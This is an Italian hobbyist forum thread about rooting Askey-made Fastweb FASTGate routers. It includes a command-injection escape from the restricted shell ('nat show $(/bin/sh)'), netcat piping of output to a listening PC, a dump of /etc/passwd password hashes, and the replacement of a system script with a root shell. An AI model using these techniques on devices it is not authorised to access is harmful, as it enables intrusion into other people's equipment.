[system_probe.c:1441] ChannelHistory Wait for boot procession complete..
[system_probe.c:1441] ChannelHistory Wait for boot procession complete..
[system_probe.c:1441] ChannelHistory Wait for boot procession complete..
[system_probe.c:1441] ChannelHistory Wait for boot procession complete..
[system_probe.c:1441] ChannelHistory Wait for boot procession complete..
[system_probe.c:1441] ChannelHistory Wait for boot procession complete..
[system_probe.c:1441] ChannelHistory Wait for boot procession complete..
[system_probe.c:1437] channel_history_boot_count==12 ; ForceAddChannelHistory2G/5G...Siccome da qui in poi qualunque comando viene "ignorato" senza restituire output (anche banalmente help; --help; ?), ho provato a spegnerlo e riaccenderlo premendo un qualunque tasto come suggerito dal primo messaggio.
A questo punto viene richiesto l'inserimento di una password, ma......non acetta nessuna di quelle standard: admin; root; lanpasswd :headbang: Sto sbagliando qualcosa io oppure, come indicato dal secondo messaggio, la password è stata cambiata?
Se eventualmente può servire/interessare posso postare tutto il boot completo :)
-
Sfortunatamente non so darti informazioni specifiche non avendo mai sperimentato su questo device, la prima prova che mi verrebbe di fare sempre che tu non abbia già fatto cosi è di riprovare dopo un reset
Comunque sono abbastanza sicuro c'è ancora qualche code execution sull'interfaccia web anche con gli ultimi firmware
-
Ho provato ad effettuare un reset, ma la situazione rimane invariata....ho provato a rileggere tutti i post di questo Thread siccome questa problematica aveva un non so che di familiare.
Effettivamente altri due utenti (yoko e taetae) avevano il medesimo problema.....proseguendo con la lettura credo di aver capito che sulle versioni successive alla 0.81 non si riesce piu ad accedere in quanto al termine del Boot la sieriale risulta "muta" non restituendo alcuna CFE.
Anche provando a premere qualunque tasto all avvio del Router (come suggerito da altri) viene richiesto solo l'inserimento di una psw (non nota) senza richiedere alcun utente....temo quindi che anche sulle versioni Firmware attuali tale accesso sia stato inibito.
Non sono molto pratico in materia di exploit e vulnerabilità dispositivi, ma con qualche dritta più specifica da parte di qualcuno di più esperto sono convito di poter ottenere qualche risultato......@smx129 magari avresti qualche dritta da darmi?
Ho provato ad effettuare una scansione (con Armitage per chi lo conosce) e non viene rilevata alcuna vulnerabilità nota, ma essendo un "semplice" tool con GUI praticamente del tutto automatizzato, non sono certo dell affidabilità di tale verifica.
A questo punto ho provato a seguire le indicazioni che avevo letto in precedenza (https://www.ilpuntotecnico.com/forum/index.php/topic,78037.msg243315.html#msg243315) per tentare di accedere alla pagina di Boardcom per tentare di flashare un Firmware piu vecchio, ma non raggiungo la pagina 192.168.1.1 (nemmeno con reset 30-30-30).
-
Come postato anche prima, Qui viene spiegato come farlo con seriale.
https://slides.poul.org/2018/workshop-interni/fastgate-hacking
Il sito non funziona, nel senso che appare solo una scritta e non si pò cliccare su nulla.
Si sa nulla sull'"apertura" del suddetto device?
-
Sono slide, si avanza con le freccette.
-
salve,
ho un fastgate askey bloccato e volevo sbloccarlo per altri operatori ed aggiornarlo.
son riuscito ad accedere via ssh ma non trovo i files firmware.
in repository non riesco a trovare il firmware. e' ancora lì?
-
Salve . Ho anch'io un fastgate askey e dovrei sbloccarlo per tim. Il problema e che sono totalmente ignorante in materia. Ho provato a suguire la guida a slide ma non ho ben capito dove devo inserire le stringhe di testo. Nella mia ignoranza ho collegato il modem con un cavo etherney e le ho digitate nella barra di firefox ma niente da fare. Non è che conoscete un sistema di sblocco a prova d'imbranato. Grazie :pray:
-
Mi piacerebbe anche a me vedere questo modem sbloccato
-
Purtroppo sono parecchio ignorante in materia e anche la guida con le slide per me è arabo. Ne andrei anche a comprare uno ma visto il periodo non posso muovermi per motivi così futili.
-
Ciao, avendo cambiato gestore mi ritrovo in mano questo modello...
Ho attaccato il routeral pc, seriale/usb, e con putty vedo il boot.
CFE version 1.0.38-118.3 for BCM963138 (32bit,SP,LE)
Build Date: Tue Nov 1 23:00:13 CST 2016 (charles@charles-All-Series)
La fine del boot è questa: ForceAddChannelHistory2G/5G...
Non mi chiede altro, ho provato a fermare il boot per settare il flag di boot per caricare il fw precedente, non sono riuscito a fermare il boot quando chiede: *** Press any key to stop auto run (1 seconds) ***
Auto run second count down: 1
[charles dbg] waiting for (key1=33, key2=34, key3=36, rst=32) key1=1 key2=1 key3=1 rst=1
Troppo veloce e soprattutto non saprei come impostare il flag del boot.
Ho letto tutte e 12 le pagine di questo thread ma mi manca evidentemente qualcosa di fondamentale per proseguire.
C'è qualcuno che mi può indirizzare per favore?
Grazie
S.
edit
Riuscito a selezionare il boot precedente il risultato è lo stesso: ForceAddChannelHistory2G/5G...
CFE> c
...
Boot image (0=latest, 1=previous) : 1
Default host ramdisk file name :
Default ramdisk store address :
*** command status = 0
Qualcuno che mi indichi il passo successivo per favore?
Grazie
S.
-
Buona Pasqua,
è possibile caricare un firmware precedente che mi consenta l'accesso alla shell?
Grazie...Anche se quì collaboration zero.
Risolto. :clap:
-
Ciao, scusa, potresti dirmi come hai risolto?
-
in realtà i firmware sono presenti da un pezzo sul repository qui....
@Ansuel nel repository la cartella Askey è vuota... :)
Ciao, scusa, potresti dirmi come hai risolto?
Ho risolto che ho avuto l'accesso con admin ma telnet è chiuso e non c'è verso di cambiare utente con diritti root, es lanadmin o FASTGate. Firm ver. 00.67
ACCEPT tcp -- 192.168.0.0/16 anywhere tcp dpt:ssh
ACCEPT tcp -- 127.0.0.0/8 anywhere tcp dpt:ssh
DROP tcp -- anywhere anywhere tcp dpt:ssh
ACCEPT tcp -- 192.168.0.0/16 anywhere tcp dpt:telnet
ACCEPT tcp -- 127.0.0.0/8 anywhere tcp dpt:telnet
DROP tcp -- anywhere anywhere tcp dpt:telnet
Con l'utente admin non si riesce neanche a terminare i servizi (kill), magari non usando telnet ma rimanendo sulla seriale almeno per modificare il DNS.
Firmware con telnet ancora aperto non li ho trovati...
-
Ci siamo io e MisterFTTH, come due particelle di sodio... :rotfl:
-
Il metodo di privilege escalation dopo aver fatto l'accesso con utente admin è descritto nelle slide postate prima, in breve mi pare usi il comando sh -l
-
Ciao, grazie per l'intervento.
Una volta loggato con admin, il router mi fa accedere alla shell tramite il comando sh, attenzione il comando sh -l dovrebbe chiedere l'autenticazione ma nel mio caso non lo fa.
Praticamente ho la shell ma non mi richiede l'autenticazione.
Posso inserire le regole per l'iptables
posso montare il filesystem (ubisf)
Non ho accesso al telnet...Ho anche provato a rilanciare il servizio (telnetd) (magari non serve se lavoro con la seriale)
Non sono riuscito a buttare giù il servizio DNS.
Non ho ancora provato a scrivere dei file es iptables e firewall
-
echo $(telnetd) lo hai provato?
echo $(ls) ?
Se non hai gli stessi risultati delle slide (e già che sh -l non funziona penso sia così) direi che sei su un firmware troppo nuovo e patchato, con un po di impegno forse si riesce a trovare un'altra escalation, ma per semplicità ti direi in primis di cercare di replicare quello che accade in quelle slide.
hai provato a lanciarci addosso un nmap? guardando le slide è l'unico modo che abbiamo per fare un matching delle versioni (e nemmeno affidabile dato che difficilmente aggiornano librerie "di contorno" nei firmware, quindi saranno sempre uguali anche nei piu nuovi)
Linux 2.6.X|3.X
mini_httpd 1.27
MiniUPnPd 1.6
-
# /usr/sbin/rc_task telnetd restart
Jan-01 01:25:28 rc_task: Restart telnetd
# echo $(telnetd)
telnetd:error:580.434:oalMsg_initWithFlags:115:connect to /var/smd_messaging_server_addr failed, rc=-1 errno=2
telnetd:error:580.435:cmsMdm_initWithAcc:185:must pass in msgHandle
telnetd:error:580.435:main:534:Could not initialize MDM, ret=9003
# echo $(ls)
bin bootfs data debug dev etc hotspot include lib libexec linuxrc mnt opt proc run sbin share statusapi sys tmp usr var web webs
Il firmware non è neanche così nuovo, è la 00.67 con la .87 ancora si entra.
Aggiornamento, Entrato con SSH.
ssh [email protected]
Sono riuscito ad avere l'accesso via ssh, le prime credenziali sono lanadmin, su sh è FASTGate...
Che poi 'sto FASTGate non lo vedo:
# cat /etc/passwd
admin:$1$FHWaid3B$vFyw91DvQZTDegFWLn64M.:0:0:Administrator:/:/bin/sh
support:$1$7pc/NAub$5qzppJEC5qhc.mI5OYSUV/:0:0:Technical Support:/:/bin/sh
user:$1$VO8.8yVA$n6AIUOzrPnVuL5DR/Wi0R0:0:0:Normal User:/:/bin/sh
nobody:$1$87Zykg2O$Xb108bj3MlwCAxXFsdctm.:0:0:nobody for ftp:/:/bin/sh
lanadmin:$1$EU6LH8cA$CnBB02d6d6vLzMNrc08Ww1:0:0:SSH User:/:/bin/st_shell
-
L'errore era nella configurazione dell'iptabes, questa è quella che ha funzionato:
# /bin/iptables -D INPUT -i br0 -p tcp -m tcp --dport 22 -j DROP
# /bin/iptables -I ACL_FASTWEB_SSH_TELNET_LIST -s 192.168.1.0/24 -j ACCEPT
# /bin/iptables -D INPUT -i br0 -p tcp -m tcp --dport 23 -j DROP
# /bin/iptables -I ACL_FASTWEB_SSH_TELNET_LIST -s 192.168.1.0/24 -j ACCEPT
Domanda, con dd la copia dei file mtd in dev/ deve essere fatta singolarmente oppure c'è una impostazione tipo /dev/mtd*?
P.S. sto copiando su una USB
Domanda, per rendere fisse le modifiche al firewall si crea un wrapper rinominando l'originale firewall.sh e copiando un altro firewall.sh
Cosa inserisco nel nuovo firwall.sh?
Le stringa 'fw_script, le nuove regole per l'accesso locale'?
Grazie
-
Se per questo io vedo anche lanadmin che è su st_shell, se sh -l non ti da il login come ti sei loggato su sh non l'ho capito...
comunque nel wrapper direi che ci metti prima l'esecuzione di quello originale, e subito dopo i comandi che ti fanno il remove di quello che lui blocca e a te non piace lo faccia
-
Tramite seriale, finito il boot, login con admin admin.
Comando sh -l 'apre la shell' senza autenticazione.
modifica iptables per gli indirizzi locali 192*, telnet (porta23) ssh (porta22)
Apro telnet o ssh, login lanadmin
prompt -> lancio sh e mi richiede l'autenticazione: FASTGate
P.S.
Mtd11 non me lo fa copiare, device o resource busy
-
Tutte le prove e modifiche e script non riesco a fargli caricare al boot il firewall.sh sostituito all'originale, significa che devo lavorare con la seriale.
Se firewall.sh lanciato a mano mi apre l'accesso a ssh e telnet da boot nada de nada...Sto valutando di intervenire con un editore hex direttamente sul firewall.sh originale che è un binario.
Non mi consente di variare i permessi sui file della cartella etc/ (il filesystem ubifs è montato) non credo sia importante ma l'ho notato.
Non riesco a fare il dump della mtd11 (rootfs), nandump-dd-cat, la risposta è sempre che il device è busy.
Considerato nullo l'interesse per questo gateway, credo che passerò un altro paio di giorni a cercare di trovare una soluzione poi amen. ..Anche perchè se poi diventa un fermacarte non credo che magicamente ci sia qualcuno disponibile ad aiutarmi.
-
non credo con l'hex editor cambi qualcosa, immagino il problema sia proprio che non riresci a modificare in modo permanente il file firewall.sh però bho lì dalle slide non sembrava ci fossero limitazioni particolari...
-
Se non fosse permanente non potrei avere l'accesso ssh o Telnet lanciandolo a mano. Creato con vi direttamente dal gateway. Possibile che le slide fanno riferimento ad una release, 0.47, di cui ne hanno corretto il bug principale, l'exploit via interfaccia web. La mia versione è la .67, due dopo quella difettosa. Come alternativa pensavo a inittab per lanciare lo script.
Con l'hex sostituisco un ip Fastweb con il 192.168 ecc.
-
inittab lo vedo un po violento, rc.local semplicemente nemmeno riesci a modificarlo? il problema è che senza fare un wrapper ogni volta che ti si riavvia il firewall te li ritroveresti bloccati
-
rc.local non cè, inittab c'è ma non viene utilizzato, ho messo un link nella rc3.d processa i file con ordine Sxx, xx da 0 a 99 (credo)
e così funziona...Anche se rimane il dubbio di come viene richiamato il firewall originale visto che il nome l'ho cambiato.
Nel frattempo che una soluzione sporca l'ho trovata, in mancanza di altro pensavo di ripristinare il file originale e limitare lo script ad aggiungere le regole che servono nella iptables.
-
Buonasera a tutti. Una mia amica avrebbe bisogno di accedere periodicamente da remoto (quindi non all'interno di una stessa rete locale) a un PC collegato a Internet tramite questo modem, accendendo ogni volta il computer da uno stato di spegnimento. Qualcuno sa dirmi se una volta sbloccato il modem con seriale (seguendo la guida sopra riportata) sia possibile abilitare una funzione Wake-on-Wan? Grazie.
-
Salve,
novità per lo sblocco di questo modem? Mio cugino ha questo Fastgate prodotto da Askey sul groppone e vorrebbe personalizzarlo per poterne estendere le funzionalità. Qualcosa di simile all'unlock dell'altra versione (dga413qfwb) esiste o no? Se si quale procedura funziona attualmente?
Versione 0.00.81 FW 200 ASKEY 2018-10-02 18:00
Versione software 1.0.1b
Versione hardware GATE01
GRAZIE!
-
Ciao Ragazzi, il mio rtv1907vw non mi fa accedere via seriale
non appare proprio nulla, premetto che il modulo usb funziona perchè lo uso con altro
quindi ho fatto la seguente
ho collegato il fastgate tramite la porta wan (etherne4) al mio pc sul quale ho avviato un server dhcp
ho fatto assegnare al fastgate l'ip 10.1.120.2 (che fa parte della subnet autorizzata per l'accesso ssh)
riesco ad accedere con lanadmin - lanpasswd
ma non ho una shel, solo un'interfaccia ristretta, quindi non posso avviare sh me fare su
qualcuno conosce la password di root ? o di qualche altro utente con il quale posso provare ?
di seguito ciò che mi appare al login (allego immagine)
Grazie a tutti
(https://i.paste.pics/b3437532b3fe0f7b82e9383f5ae1de5f.png?trs=d3c323d495e614046c9a0a9393dc19c48760158905d5202b0f48d6661ac98d11)
-
Ciao, anche io sono tra quelli che non riesce a sbloccare il FASTGate.
Da seriale purtroppo non si apre nessuna shell e nemmeno la procedura di pagina 4 per flashare un vecchio firmware funziona.
@8nano non mi è molto chiaro come hai fatto il boot con la previous, in quale momento bisogna premere quale tasto? L'unica cosa che salta fuori è *** Press any key to stop auto run (1 seconds) *** dove premendo qualsiasi tasto mi chiede una password sconosciuta.
@S0nico vorrei provare anche io quello che hai detto, imposto il router con 10.1.120.2 tramite DHCP ed il mio PC lo imposto come 10.1.120.1 giusto? Va solo con Telnet o anche in SSH?
Grazie!
-
@serniko97 entrambi sia telnet che ssh, cmq da seriale a me non appare nulla, alcuna scritta e nemmeno io riesco con la procedura descritta a pagina 4 per caricare un nuovo firmware
-
Strano che non ti vada la seriale UART, io ho la stessa situazione di @Alex92 per capirci.
Hai collegato RX con TX e viceversa, vero? Il baud deve essere 115200 bit/s, niente bit di parità ed un solo bit di stop se non sbaglio.
-
@serniko97 entrambi sia telnet che ssh, cmq da seriale a me non appare nulla, alcuna scritta e nemmeno io riesco con la procedura descritta a pagina 4 per caricare un nuovo firmware
Ottimo, sono riuscito ad entrare col tuo trucco del DHCP ma purtroppo non sembra essere molto utile.
In questo articolo https://julians.design/2018/02/26/fastgate/ (https://julians.design/2018/02/26/fastgate/) nella sezione commenti Yoko ha usato la stessa tecnica ed ha ottenuto il comando sh avviando con la previous ma non conosceva username e password...
-
Ragazzi, sono risucito a sbloccare tutto usando solo la porta WAN. Di seguito i punti:
1) Data la difficolta di far funzionare il server DHCP sul mio computer principale, ho optato per una Raspberry
2) Una volta configurato correttamente ho impostato il pool di indirizzi con 10.1.120.0/24
3) Entrato nel router, ho digitato "help" per avere la lista dei comandi possibili, ha attirato la mia attenzione il comando "nat" che permetteva anche di filtrare i risultati tramite una expression.... Penso che qualcuno potrà già intuire il l'exploit usato.
4) Digitando, quindi, "nat show $(/bin/sh)" si viene catapultati in una angusta shell Linux (pochissimi output).
5) Usando nc (netcat) si riesce a sopperire a quest'ultima mancanza e lavorarci un po' sopra; mi sono ispirato a SQL Injection via web (con le nuove versioni firmware via web non è più possibile), mi è bastato quindi dare il comando "nc -lvvp 8082" su un'altra shell di terminale sulla Raspberry e aggiungere la stringa " | nc 10.1.120.1 8082" per ogni comando nella shell del Fastgate quando volevo vedere l'output.
6) File system in read only, ho abilitato rw con questi comandi https://slides.poul.org/2018/workshop-interni/fastgate-hacking/#/37
7) Ho inserito una chiavetta nel router e copiato il file /usr/sbin/stshell/ntp.sh dentro quest'ultima, l'ho editato sosituendo tutta la parte coi vari "show=", fino ai due "echo" compresi, con un unico e imponente "/bin/sh -l".
8 ) Rimessa la chiavetta nel router e copiato il file modificato dalla chiavetta alla sua posizione iniziale (dopo aver fatto un backup del file originale)
9)Tolto la chiavetta dal router e rientrato tramite ssh. Mi è bastato dare "ntp show" per vedermi droppata una shell completamente funzionante!
versione immagine del router: 0.00.89
Spero di aver aiutato qualcuno, molte cose le ho fatte un po' a caso e non so quanto siano replicabili.
Prossima missione: sbloccare ssh nella LAN e installare la GUI Ansuel 8) 8)
Edit: SSH sbloccato grazie alla guida nelle slides linkate in alto (https://slides.poul.org/2018/workshop-interni/fastgate-hacking/#/40). SSH ora aperto anche per gli IP 192.168 nella LAN. Unico appunto, bisogna collegare il modem alla WAN (anche senza server DHCP attivo) all'accensione per avere la porta aperta (altrimenti non va).
Se qualcuno che ne sa di più riuscisse a editare le regole di iptables per avere la porta SSH aperta senza dover collegare il router alla WAN, sarebbe ottimo. Inoltre altre cose interessanti sarebbero:
- installare qualche applicativo essenziale (tipo nano),
- poter usare in linea di comando i binari in /statusapi/usr/bin senza dover scrivere il percorso completo ogni volta (ci sono vari programmi, come stat).
Edit2:
-per usare i binari in statusapi senza scrivere il percorso, ho dato il comando export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/statusapi/bin:/statusapi/sbin:/statusapi/usr/bin:/statusapi/usr/sbin
-purtroppo, a causa di una mia svista, il router è definitviamente (credo) briccato (anche in recovery la porta http rimane chiusa). Se qualcuno ha qualche consiglio per resuscitarlo, è ben accetto.
-
ciao, non sono riuscito a fare il punto 5, ma sono arrivato, vedendo in chiaro, alla prima parte del punto 7 piu o meno.
non trovo una dir /usr/sbin/ se non come sotto cartella, e comunque non trovo il file ntp.sh nella dir "\lib\lxc\rootfs\usr..."
da qui non ho avuto pazienza di copiare un singolo file, ma tutto e lo allego se puo servire, noto che ci sono moltissimi sh e programmi linux in chiaro
ultima cosa, essendo un noob, come si vede, non so replicare e arrivare sempre a quella struct che ho copiato, se qualcuno lo sa me lo dica per cortesia
grazie e bel lavoro
qui i file: https://mega.nz/folder/KIkRjS7I#C3hrWcSB_ozNy4XmG1c-WQ (https://mega.nz/folder/KIkRjS7I#C3hrWcSB_ozNy4XmG1c-WQ)
-
@belgio96 supponiamo tu voglia vedere l'output del comando "help" e che l'indirizzo del computer in cui è presente il server DHCP sia 10.120.1.1, dovrai:
1) Avere due finestre di terminale aperte A e B (su Linux il comando nc è preinstallato, su Windows no)
2) Nella finestra A fai l'accesso SSH al router ed entri nella shell root come spiegato
3) Nella finestra B dai il comando "nc -lvvp 8082", dovrebbe dirti di essere in ascolto.
4) Nella finestra A dai il comando "help | nc 10.120.1.1 8082"
5) Ora nella finestra B dovrebbero comparire delle scritte, cioè l'output del comando
6) Non sono sicuro della posizione dei file, comunque basta che nella finestra del router tu dia il comando "find / -name ntp.sh | nc 10.120.1.1 8082" e dovrebbe diriti il percorso.
P.S. Il firmware che hai caricato su Mega non è completo (mi era capitato anche a me ma non ricordo come ho risolto), comunque ho appena guarda sul firware che avevo dumpato e ti confermo che esiste /usr/sbin/stshell/ntp.sh. Altra cosa, ricordati di guardae che permessi ha ntp.sh prima di sostituirlo (puoi usare il comando "stat /usr/sbin/sshell/ntp.sh" dopo aver dato il comando export che ho scritto nel post precedente. È importante che l'utente, il gruppo e i permessi siano gli stessi dell'originale, altrimenti non so se funziona. In ogni caso per cambiare i permessi (supponendo che nell'originale sia 755) basta dare "chmod 755 /usr/sbin/stshell/ntp.sh".
-
Ragazzi, sono risucito a sbloccare tutto usando solo la porta WAN. Di seguito i punti:
1) Data la difficolta di far funzionare il server DHCP sul mio computer principale, ho optato per una Raspberry
2) Una volta configurato correttamente ho impostato il pool di indirizzi con 10.1.120.0/24
3) Entrato nel router, ho digitato "help" per avere la lista dei comandi possibili, ha attirato la mia attenzione il comando "nat" che permetteva anche di filtrare i risultati tramite una expression.... Penso che qualcuno potrà già intuire il l'exploit usato.
Ciao!
io posseggo questo router e attualmente è il mio router principale (vorrei solamente poter modificare i dns usando quelli opendns, quindi una modifica abbastanza leggera...), ha il firmware 0.00.92_FW_200_Askey 2020-08-28 10:19:33
ho provato a lanciare un server dhcp (dhcpsrv per windows) e una volta configurato sul pool degli indirizzi con qualche difficoltà (per le prime 10 volte mi da Reject request because client asks for another address) ha assegnato l'ip al router, ma non funziona ne ssh ne telnet solo il ping (a volte perde i pacchetti)
hanno per caso messo delle ulteriori limitazioni (ip/mac address o altro?)
tu con che firmware sei riuscito ad entrare in ssh?
grazie mille anticipatamente
-
Il firmware, come ho scritto sul mio post principale era il 0.00.89. Per quando riguarda dhcpsrv per Windows, io non sono riuscito a farlo partire, prova ad usare una macchina Linux se ce l'hai e usare isc-dhcp-server (mi pare si chiami così). Altrimenti prova ancora su dhcpsrv, se l'indirizzo è corretto, prova a staccare internet dal computer quando provi ad entrare nel router.
-
Ok grazie
Scusa ieri sera mi sono letto tutta la discussione e mi sono perso quando specificavi la versione
Ok provo con una live Linux allora
La cosa strana è che il Ping funziona ma ssh/telnet mi da connection refused...
Se non dovesse andare proverei la strada di questo exploit...
https://www.exploit-db.com/exploits/47654
Stay tuned
E grazie della pronta risposta!
-
niente, con il firmware 0.00.92 hanno fatto qualcosa in più dato che
1) riesco a fornire un indirizzo ip del tipo 10.1.120.x tramite porta wan
2) riesco a pingare utilizzando l'indirizzo ip fornito
MA non ho accesso ne ssh ne telnet
ho provato anche l'exploit https://www.exploit-db.com/exploits/47654 ma non funziona neppure quello...
se qualcuno ha una idea in più....
-
Prova a fare una scansione con nmap e vedi se le porte SSH e Telnet te le dà "filtrered"
-
Prova a fare una scansione con nmap e vedi se le porte SSH e Telnet te le dà "filtrered"
Con molta calma ci sono riuscito
Ho devoluto resettare il router e tenerlo staccato dalla linea telefonica
Ora sto provando ad aprire ssh in lan ma non riesco...
-
Per usare SSH in LAN devi seguire ciò che ho scritto nella guida e creare lo script che lo abiliti ad ogni riavvio. Comunque, anche dopo averlo fatto, ogni volta che si avvia devi collegarlo per qualche secondo sulla rete WAN (anche collegandolo al computer col server DHCP spento a me andava bene), fatto ciò sposti il cavo ethernet su una porta LAN normale e dovresti essere in grado di entrare in SSH.
-
Per usare SSH in LAN devi seguire ciò che ho scritto nella guida e creare lo script che lo abiliti ad ogni riavvio. Comunque, anche dopo averlo fatto, ogni volta che si avvia devi collegarlo per qualche secondo sulla rete WAN (anche collegandolo al computer col server DHCP spento a me andava bene), fatto ciò sposti il cavo ethernet su una porta LAN normale e dovresti essere in grado di entrare in SSH.
ok ce l'ho fatta, confermo il funzionamento anche sul firmware 0.00.92
il cavo sul wan ce l'ho sempre collegato per cui a me va benissimo anche così
grazie mille, ora vedo se riesco a modificare il server DNS principale (che era anche il mio scopo iniziale)
-
a proposito tu sai come fare?
# cat /etc/resolv.conf
nameserver 62.101.93.101
nameserver 83.103.25.250
devo semplicemente modificare questo file no?
-
Ciao, purtroppo non so dirti dato che come router principale ho il FastGate Technicolor e questo sarebbe stato da buttare... Se te la senti puoi provare a rischiare
-
ciao, aggiorno questo post dicendo che ho trovato il modo (grazie a https://julians.design/2018/02/26/fastgate/ (https://julians.design/2018/02/26/fastgate/))
bisogna killare il servizio dnrd
kill $(ps aux | grep /usr/sbin/dnrd | grep -v grep | awk '{print $1}')poi far partire il servizio specificando i server dns
/usr/sbin/dnrd -u 2 -a [IP DEL FASTGATE] -b -r 0 -m hosts -c off -s [DNS1] -s [DNS2] -R /tmp/dnrd.lan --stats 1
questa modifica non è permanente (infatti stamattina i dns me li sono trovati standard e quindi qualcosa li ha cambiati di nuovo)
ora devo capire quali sono gli script che si prendono i dns e li applicano, con la stessa logica del firewall poi si modifica il file e si rende permanente....
-
chiedo preventivamente scusa se "sporco" il post con una domanda molto banale. Questo router, senza alcuna modifica, pensate possa essere utilizzato con un operatore diverso in FTTC? (non mi serve il voip). Grazie
-
No
-
ok, grazie
-
ciao, aggiorno questo post dicendo che ho trovato il modo (grazie a https://julians.design/2018/02/26/fastgate/ (https://julians.design/2018/02/26/fastgate/))
bisogna killare il servizio dnrd
kill $(ps aux | grep /usr/sbin/dnrd | grep -v grep | awk '{print $1}')poi far partire il servizio specificando i server dns
/usr/sbin/dnrd -u 2 -a [IP DEL FASTGATE] -b -r 0 -m hosts -c off -s [DNS1] -s [DNS2] -R /tmp/dnrd.lan --stats 1
questa modifica non è permanente (infatti stamattina i dns me li sono trovati standard e quindi qualcosa li ha cambiati di nuovo)
ora devo capire quali sono gli script che si prendono i dns e li applicano, con la stessa logica del firewall poi si modifica il file e si rende permanente....
continuando la mia crociata penso di aver risolto, ho modificato il modo nel quale viene usato il file binario "rc_task" facendo una cosa del tutto simile a quanto fatto per firewall, sostituito il comando con uno script che chiama lo stesso file binario ed esegue alcune istruzioni dopo
istruzioni:
1) montare il fs in rw
2) copiare /usr/sbin/rc_task in /usr/sbin/rc_task_orig
3) creare file /usr/sbin/rc_task (con gli stessi permessi)
#!/bin/sh
# Launch original rc_task binary and pass over parameters
/usr/sbin/rc_task_orig $@
if [ "$1" = "dnrd" ]; then
case $2 in (start|checkstart|depstart|restart)
DNS1=208.67.222.222
DNS2=208.67.220.220
GW=`stnvram get lanip | /statusapi/bin/sed 's/^.*=//'`
kill $(ps aux | grep /usr/sbin/dnrd | grep -v grep | awk '{print $1}')
/usr/sbin/dnrd -u 2 -a $GW -b -r 0 -m hosts -c off -s $DNS1 -s $DNS2 -R /tmp/dnrd.lan --stats 1
;;
esac
fi
per la cronaca io ho messo i dns di opendns
-
chiedo preventivamente scusa se "sporco" il post con una domanda molto banale. Questo router, senza alcuna modifica, pensate possa essere utilizzato con un operatore diverso in FTTC? (non mi serve il voip). Grazie
scusate, nonostante il no (secco) di Luke avendo occasione di fare una prova da mia madre (che ha FTTC come quella dell'amico proprietario del router che mi aveva chiesto) ho attaccato il fastgate a linea fibra.city FTTC ....nonostante luce rossa lampeggiante dopo alcuni minuti ho appena premuto il tasto reset , e il roiter si è allineato prendendo l'IP e linea... naviga perfettamente (senza voip ovviamente linea solo dati). Lo scrivo solo perchè potrebbe far comodo a qualcuno che avesse intenzione di riciclarlo come modem libero. Grazie e scusate l'intromissione....
-
Si chiaro, ti è andata bene perché fibracity casualmente usa le stesse configurazioni di dhcp/vlan di fastweb, per gli altri big non vale.
Però devi tenere presente che sul fastgate lato internet ci sono dei servizi aperti che normalmente sono limitati da fastweb agli IP non appartenenti alla sua rete. In questo momento sono liberamente accessibili a chiunque. Ti conviene fare un port scan e controllare.
-
Per usare SSH in LAN devi seguire ciò che ho scritto nella guida e creare lo script che lo abiliti ad ogni riavvio. Comunque, anche dopo averlo fatto, ogni volta che si avvia devi collegarlo per qualche secondo sulla rete WAN (anche collegandolo al computer col server DHCP spento a me andava bene), fatto ciò sposti il cavo ethernet su una porta LAN normale e dovresti essere in grado di entrare in SSH.
Spero possa essere utile ad altri... per permettere la connessione SSH da LAN io ho utilizzato il seguente sistema:
[ You must login or register to view this spoiler! ]
1)Ho verificato la configurazione del parametro AppCfgSshdAllowIF:
stnvram get CWMPX_FASTWEB_AppCfgSshdAllowIFed era uguale a:
CWMPX_FASTWEB_AppCfgSshdAllowIF=WAN
2) Ho quindi modificato il parametro NVRam:
stnvram set CWMPX_FASTWEB_AppCfgSshdAllowIF LAN
3) Ho poi verificato il parametro CWMPX_FASTWEB_AppCfgTelnet_SSH_ACL
stnvram get CWMPX_FASTWEB_AppCfgTelnet_SSH_ACLe conteneva:
[ You must login or register to view this spoiler! ]
4) Ho impostato la mia subnet LAN:
stnvram set CWMPX_FASTWEB_AppCfgTelnet_SSH_ACL 192.168.1.0/24
5) Ho effettuato il commit, in modo da persistere i parametri NVRAM al reboot:
stnvram commit
Ora anche se riavvio il Router posso sempre accedere tramite SSH tramite una porta LAN :)
-
Salve, (Mi scuso per il mio italiano)
Dopo aver fato l'update dal firmware v.67 allo 0.00.89_FW_200_Askey, confermo che questo ultimo è stato chiuso bene.
1. CFE bootloader richiede una password, quindi non si può ritornare indietro per fare il boot con il firmware precedente.
2. Shell tramite la porta seriale è disabilitata, e stato commentato dentro inittab.
3. L'ultimo st_shell non permette più il comando nascosto attraverso il telnet o ssh.
4. NVRAM e stato pulito dai tutti i password.
5. Sembra che hanno cambiato anche il password dal account "admin".
Si può ancora entrare nel shell usando il metodo descritto dal "antiloplastico" qui:
https://www.ilpuntotecnico.com/forum/index.php/topic,78037.msg270762.html#msg270762
Nel repository qui, il firmware per questo router non c'è più, neanche si trovano i firmware precedenti sul quello server di Askey. Ho trovato soltanto questo v.89 e c'è anche v.92.
Se, per caso, qualcuno di voi possiede uno v.67, sarei grato se lo mete sulle rete e mi manda il link.
Vorrei provare a fare un passò indietro. Grazie.
-
Buona sera a tutti.
Dal nulla il mio router, questo bellissimo askey, ha deciso di bloccarsi a random.
- non da più indirizzi ip
- la schermata di login non viene vista ( un schermata grigia )
- se hai l'ip fissato allora navighi
- risponde al ping
- nessun modding effettuato
Per risolvere riavvio e per qualche ora si risolve. Qualche soluzione o secondo voi faccio prima a farmelo sostituire?
-
Ciao, purtroppo non so dirti dato che come router principale ho il FastGate Technicolor e questo sarebbe stato da buttare... Se te la senti puoi provare a rischiare
Salve antiloplastico,
Se non l'hai ancora buttato via, posso offrirti una mano da resuscitare questo Askey?
Ho scoperto un paio di trucchi che possono essere utile, se non è stato bracciato ...
-
Buona sera a tutti.
Dal nulla il mio router, questo bellissimo askey, ha deciso di bloccarsi a random.
- non da più indirizzi ip
- la schermata di login non viene vista ( un schermata grigia )
- se hai l'ip fissato allora navighi
- risponde al ping
- nessun modding effettuato
Per risolvere riavvio e per qualche ora si risolve. Qualche soluzione o secondo voi faccio prima a farmelo sostituire?
